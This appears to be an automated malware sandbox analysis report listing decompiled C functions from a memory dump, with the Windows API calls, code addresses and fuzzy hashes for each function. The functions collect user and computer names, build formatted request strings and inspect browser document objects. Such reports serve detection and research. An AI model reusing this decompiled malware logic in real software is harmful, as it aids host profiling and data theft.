0x04e92035
0x04e92035
0x04e92037
0x04e9203e
0x04e92041
0x04e92046
0x04e92050
0x04e92052
0x04e9205a
0x04e92073
0x04e92077
0x04e92083
0x04e92088
0x04e92091
0x04e920a2
0x04e920a6
0x04e920af
0x04e920b5
0x04e920c2
0x04e920cf
0x04e920d5
0x04e920e1
0x04e920e7
0x04e920e8
0x04e920ed
0x04e920f3
0x04e920f9
0x04e92100
0x04e92107
0x04e9210d
0x04e92114
0x04e92118
0x04e92123
0x04e92128
0x04e9212e
0x04e92137
0x04e92137
0x04e92148
0x04e92148
0x04e92157
0x04e92157
0x04e92166
0x04e92166
0x04e92178
0x04e92178
0x04e92187
0x04e92198

APIs

GetTickCount.KERNEL32 ref: 04E91F2A
wsprintfA.USER32 ref: 04E91F77
wsprintfA.USER32 ref: 04E91F94
wsprintfA.USER32 ref: 04E91FB7
HeapFree.KERNEL32(00000000,00000000), ref: 04E91FC7
wsprintfA.USER32 ref: 04E91FE9
HeapFree.KERNEL32(00000000,00000000), ref: 04E91FF9
wsprintfA.USER32 ref: 04E92030
wsprintfA.USER32 ref: 04E92050
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04E9206D
GetTickCount.KERNEL32 ref: 04E9207D
RtlEnterCriticalSection.NTDLL(05849570), ref: 04E92091
RtlLeaveCriticalSection.NTDLL(05849570), ref: 04E920AF

Part of subcall function 04E91BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04E920C2,?,058495B0), ref: 04E91BE1
Part of subcall function 04E91BB6: lstrlen.KERNEL32(?,?,?,04E920C2,?,058495B0), ref: 04E91BE9
Part of subcall function 04E91BB6: strcpy.NTDLL ref: 04E91C00
Part of subcall function 04E91BB6: lstrcat.KERNEL32(00000000,?), ref: 04E91C0B
Part of subcall function 04E91BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04E920C2,?,058495B0), ref: 04E91C28

StrTrimA.SHLWAPI(00000000,04E9C28C,?,058495B0), ref: 04E920E1

Part of subcall function 04E9361A: lstrlen.KERNEL32(05849A78,00000000,00000000,745EC740,04E920ED,00000000), ref: 04E9362A
Part of subcall function 04E9361A: lstrlen.KERNEL32(?), ref: 04E93632
Part of subcall function 04E9361A: lstrcpy.KERNEL32(00000000,05849A78), ref: 04E93646
Part of subcall function 04E9361A: lstrcat.KERNEL32(00000000,?), ref: 04E93651

lstrcpy.KERNEL32(00000000,?), ref: 04E92100
lstrcpy.KERNEL32(00000000,00000000), ref: 04E92107
lstrcat.KERNEL32(00000000,?), ref: 04E92114
lstrcat.KERNEL32(00000000,00000000), ref: 04E92118

Part of subcall function 04E96777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,73BB81D0), ref: 04E96829

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04E92148
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04E92157
HeapFree.KERNEL32(00000000,00000000,?,058495B0), ref: 04E92166
HeapFree.KERNEL32(00000000,00000000), ref: 04E92178
HeapFree.KERNEL32(00000000,?), ref: 04E92187

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: a88b6d9bd4cbc72be7b5031cf0129e603ba66a3939d23c8af1c01700dc508320
Instruction ID: f439f68331dff74ba27c66b5d559e67032d740f968cfbfb77894ff15ca83cf86
Opcode Fuzzy Hash: a88b6d9bd4cbc72be7b5031cf0129e603ba66a3939d23c8af1c01700dc508320
Instruction Fuzzy Hash: 4461BE71500214BFEB21EBAAEC48E5A77E9EB48346F140516FA08D72E4DF39EC05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04E96C38, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E04E96C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x4e9d33c; // 0x5849798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04E9A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x4e9c18c;
				}
				_t46 = E04E918A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04E9A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x4e9d2a8; // 0x9aa5a8
						_t16 = _t75 + 0x4e9eb08; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04E9A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x4e9c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04E9A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04E9A734(_v20);
						} else {
							_t66 =  *0x4e9d2a8; // 0x9aa5a8
							_t31 = _t66 + 0x4e9ec28; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04E9A734(_v12);
				}
				return _v24;
			}

0x04e96c40
0x04e96c46
0x04e96c4d
0x04e96c53
0x04e96c57
0x04e96c5b
0x04e96c5e
0x04e96c63
0x04e96c68
0x04e96c6a
0x04e96c6a
0x04e96c73
0x04e96c78
0x04e96c7d
0x04e96c83
0x04e96c8d
0x04e96c96
0x04e96c9d
0x04e96cb6
0x04e96cbb
0x04e96cc0
0x04e96cc9
0x04e96cd2
0x04e96ce3
0x04e96cec
0x04e96cf0
0x04e96cf4
0x04e96cf9
0x04e96cfe
0x04e96d00
0x04e96d00
0x04e96d0a
0x04e96d13
0x04e96d1a
0x04e96d32
0x04e96d36
0x04e96d73
0x04e96d38
0x04e96d3b
0x04e96d43
0x04e96d54
0x04e96d60
0x04e96d68
0x04e96d6c
0x04e96d6c
0x04e96d36
0x04e96d7b
0x04e96d80
0x04e96d87

APIs

GetTickCount.KERNEL32 ref: 04E96C4D
lstrlen.KERNEL32(?,80000002,00000005), ref: 04E96C8D
lstrlen.KERNEL32(00000000), ref: 04E96C96
lstrlen.KERNEL32(00000000), ref: 04E96C9D
lstrlenW.KERNEL32(80000002), ref: 04E96CAA
wsprintfW.USER32 ref: 04E96CE3
lstrlen.KERNEL32(?,00000004), ref: 04E96D0A
lstrlen.KERNEL32(?), ref: 04E96D13
lstrlen.KERNEL32(?), ref: 04E96D1A
lstrlenW.KERNEL32(?), ref: 04E96D21
wsprintfW.USER32 ref: 04E96D54

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: 2b510c303fbab3448475b790464e6fe397b2f98418c6861080b6d9dc1d48e641
Instruction ID: 2a3f1632dcbbbf9922c9b6972a9781cbeac9bdcb483d4cb4d74121882258c5b2
Opcode Fuzzy Hash: 2b510c303fbab3448475b790464e6fe397b2f98418c6861080b6d9dc1d48e641
Instruction Fuzzy Hash: 35412876900219FBDF11AFA5CC09DDEBBB5EF44318F154062E904AB2A0DB35EE54EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04E91BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E04E91BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4e9d2a8; // 0x9aa5a8
				_t1 = _t9 + 0x4e9e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04E9173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04E9A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04E964EF(_t34, _t41, _a8);
						E04E9A734(_t41);
						_t42 = E04E96467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04E9A734(_t36);
							_t36 = _t42;
						}
						_t43 = E04E917E5(_t36, _t33);
						if(_t43 != 0) {
							E04E9A734(_t36);
							_t36 = _t43;
						}
					}
					E04E9A734(_t28);
				}
				return _t36;
			}

0x04e91bb6
0x04e91bb9
0x04e91bba
0x04e91bc2
0x04e91bc9
0x04e91bd0
0x04e91bd4
0x04e91bda
0x04e91be1
0x04e91be6
0x04e91bf8
0x04e91bfc
0x04e91c00
0x04e91c06
0x04e91c0b
0x04e91c1b
0x04e91c1d
0x04e91c34
0x04e91c38
0x04e91c3b
0x04e91c40
0x04e91c40
0x04e91c49
0x04e91c4d
0x04e91c50
0x04e91c55
0x04e91c55
0x04e91c4d
0x04e91c58
0x04e91c58
0x04e91c63

APIs

Part of subcall function 04E9173D: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,04E91BD0,253D7325,00000000,00000000,745EC740,?,?,04E920C2,?), ref: 04E917A4
Part of subcall function 04E9173D: sprintf.NTDLL ref: 04E917C5

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04E920C2,?,058495B0), ref: 04E91BE1
lstrlen.KERNEL32(?,?,?,04E920C2,?,058495B0), ref: 04E91BE9

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

strcpy.NTDLL ref: 04E91C00
lstrcat.KERNEL32(00000000,?), ref: 04E91C0B

Part of subcall function 04E964EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04E91C1A,00000000,?,?,?,04E920C2,?,058495B0), ref: 04E96506

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04E920C2,?,058495B0), ref: 04E91C28

Part of subcall function 04E96467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04E91C34,00000000,?,?,04E920C2,?,058495B0), ref: 04E96471
Part of subcall function 04E96467: _snprintf.NTDLL ref: 04E964CF

Strings

=, xrefs: 04E91C22

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: b9dec2ebe30c19e30d9626936cd900dd948db871d5b11375f83faf77703ec5a4
Instruction ID: 25b1320744c8dbbf7e391f72dea184d35909581f78cb3355ac67f8caa60d6e7d
Opcode Fuzzy Hash: b9dec2ebe30c19e30d9626936cd900dd948db871d5b11375f83faf77703ec5a4
Instruction Fuzzy Hash: 6511257750122677AF16BBB59C84CAF77EDDF456693151126FA009B2C0DE38FC0287A0

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A199, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E9A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04E9A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04E9A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4e91fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x04e9a1a7
0x04e9a1aa
0x04e9a1ad
0x04e9a1b3
0x04e9a1b8
0x04e9a1be
0x04e9a1c6
0x04e9a1c9
0x04e9a1cf
0x04e9a1d4
0x04e9a1e1
0x04e9a1ee
0x04e9a1f2
0x04e9a1f4
0x04e9a1f8
0x04e9a1fb
0x04e9a20b
0x04e9a25e
0x04e9a25f
0x04e9a20d
0x04e9a212
0x04e9a213
0x04e9a218
0x04e9a21b
0x04e9a22e
0x00000000
0x04e9a230
0x04e9a233
0x04e9a238
0x04e9a246
0x04e9a249
0x04e9a24f
0x04e9a254
0x00000000
0x04e9a256
0x04e9a256
0x04e9a259
0x04e9a259
0x04e9a254
0x04e9a22e
0x04e9a264
0x04e9a265
0x04e9a1d4
0x04e9a26b

APIs

GetUserNameW.ADVAPI32(00000000,04E91FD2), ref: 04E9A1AD
GetComputerNameW.KERNEL32(00000000,04E91FD2), ref: 04E9A1C9

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

GetUserNameW.ADVAPI32(00000000,04E91FD2), ref: 04E9A203
GetComputerNameW.KERNEL32(04E91FD2,?), ref: 04E9A226
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04E91FD2,00000000,04E91FD4,00000000,00000000,?,?,04E91FD2), ref: 04E9A249

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 1db60050e5e2c5847416355dbad1998e6d1fa36b8eb56c87d7c3c735625b2739
Instruction ID: 38eb7aa3800c3435a65a80467c1925a3778336fc82824e4931baf83ef628ed23
Opcode Fuzzy Hash: 1db60050e5e2c5847416355dbad1998e6d1fa36b8eb56c87d7c3c735625b2739
Instruction Fuzzy Hash: D821FA76A01148FFDB15DFE5D9848EEBBF8EF44304B5054AAE501E7284EA34AF04DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E93DE9, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04E93DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04E95AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04E9A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4e9d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x04e93de9
0x04e93df6
0x04e93df8
0x04e93e5b
0x00000000
0x04e93e5b
0x04e93e10
0x04e93e17
0x04e93e23
0x04e93e28
0x04e93e2a
0x04e93e2c
0x04e93e2e
0x04e93e30
0x04e93e32
0x04e93e3e
0x04e93e4e
0x00000000
0x04e93e40
0x04e93e40
0x04e93e47
0x04e93e54
0x04e93e54
0x04e93e54
0x04e93e47
0x04e93e3e
0x04e93e59
0x00000000
0x00000000
0x04e93e5f

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,04E967B8,?,?,00000000,00000000), ref: 04E93E23
ResetEvent.KERNEL32(?), ref: 04E93E28
GetLastError.KERNEL32 ref: 04E93E40
GetLastError.KERNEL32(?,?,00000102,04E967B8,?,?,00000000,00000000), ref: 04E93E5B

Part of subcall function 04E95AF1: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,04E93E08,?,?,?,?,00000102,04E967B8,?,?,00000000), ref: 04E95AFD
Part of subcall function 04E95AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04E93E08,?,?,?,?,00000102,04E967B8,?), ref: 04E95B5B
Part of subcall function 04E95AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04E95B6B

SetEvent.KERNEL32(?), ref: 04E93E4E

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 1894ee1a6bac05cee4247f4f0d0858173c4a1b245e80df0ad16e3190fc39ca32
Instruction ID: 0ae7ebe7a0cd662036d848d63433ecd05710442373e1a4cd16b7896b6e34761e
Opcode Fuzzy Hash: 1894ee1a6bac05cee4247f4f0d0858173c4a1b245e80df0ad16e3190fc39ca32
Instruction Fuzzy Hash: 83014B31104342ABDF316B62DC48F5FBBE8EF48B69F205B26F952910E0DB61EC149A65

Uniqueness

Uniqueness Score: -1.00%

Function 04E93E69, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E93E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4e9d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4e9d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4e9d258 = _t6;
					 *0x4e9d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4e9d254 = _t7;
					if(_t7 == 0) {
						 *0x4e9d254 =  *0x4e9d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x04e93e71
0x04e93e77
0x04e93e7e
0x00000000
0x04e93ed8
0x04e93e80
0x04e93e88
0x04e93e95
0x04e93e95
0x04e93ed5
0x00000000
0x04e93ed5
0x04e93e97
0x04e93e97
0x04e93e9c
0x04e93eae
0x04e93eb3
0x04e93eb9
0x04e93ebf
0x04e93ec6
0x04e93ec8
0x04e93ec8
0x00000000
0x04e93ecf
0x04e93e91
0x00000000
0x00000000
0x04e93e93
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04E9131F,?,?,00000001,?,?,?,04E94EF2,?), ref: 04E93E71
GetVersion.KERNEL32(?,00000001,?,?,?,04E94EF2,?), ref: 04E93E80
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04E94EF2,?), ref: 04E93E9C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04E94EF2,?), ref: 04E93EB9
GetLastError.KERNEL32(?,00000001,?,?,?,04E94EF2,?), ref: 04E93ED8

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: ded0043421474acb01e4065f14541c72dd99e6b9b5f956532ab64f9e06bcfb8f
Instruction ID: 7c4cf58808758964b1b96675d72eb7cccbd4044ddc388c0e18b2821de3c2ab52
Opcode Fuzzy Hash: ded0043421474acb01e4065f14541c72dd99e6b9b5f956532ab64f9e06bcfb8f
Instruction Fuzzy Hash: 09F04F70644343ABEB249F26AD19F193BA1E788747F201517EA52CA1C8EF78EC41CB25

Uniqueness

Uniqueness Score: -1.00%

Function 04E96F3A, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E04E96F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4e9d2a8; // 0x9aa5a8
					_t5 = _t103 + 0x4e9e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4e9c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4e9d2a8; // 0x9aa5a8
												_t28 = _t109 + 0x4e9e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4e9d2a8; // 0x9aa5a8
														_t33 = _t79 + 0x4e9e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x04e96f3f
0x04e96f48
0x04e96f49
0x04e96f4d
0x04e96f53
0x04e96f59
0x04e96f62
0x04e96f68
0x04e96f72
0x04e96f74
0x04e96f7a
0x04e96f7f
0x04e96f8a
0x04e96f90
0x04e96f95
0x04e970b7
0x04e96f9b
0x04e96f9b
0x04e96fa8
0x04e96fae
0x04e96fb4
0x04e96fb8
0x04e96fbe
0x04e96fcb
0x04e96fcf
0x04e96fd5
0x04e96fd8
0x04e96fe0
0x04e96fe1
0x04e96fe5
0x04e96fe9
0x04e96fec
0x04e96fef
0x04e96ff5
0x04e96ffe
0x04e97004
0x04e97005
0x04e97008
0x04e97009
0x04e9700a
0x04e97012
0x04e97013
0x04e97014
0x04e97016
0x04e9701a
0x04e9701e
0x00000000
0x00000000
0x04e97024
0x04e9702d
0x04e97033
0x04e9703d
0x04e97041
0x04e97043
0x04e97050
0x04e97054
0x04e9705c
0x04e97061
0x04e97073
0x04e97075
0x04e9707b
0x04e9707b
0x04e97084
0x04e97084
0x04e97086
0x04e9708c
0x04e9708c
0x04e9708f
0x04e97095
0x04e97098
0x04e970a1
0x00000000
0x00000000
0x00000000
0x04e970a1
0x04e96ff5
0x04e96fef
0x04e96fd8
0x04e970a7
0x04e970a7
0x04e970ad
0x04e970ad
0x04e970b3
0x04e970b3
0x04e970bc
0x04e970c2
0x04e970c2
0x04e96f7f
0x04e970cb

APIs

SysAllocString.OLEAUT32(04E9C290), ref: 04E96F8A
lstrcmpW.KERNEL32(00000000,0076006F), ref: 04E9706B
SysFreeString.OLEAUT32(00000000), ref: 04E97084
SysFreeString.OLEAUT32(?), ref: 04E970B3

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 8965cfd32f6c3ad49abaebd07fb8ce472e86eb8bb1de8beb1bbb7fd946518c11
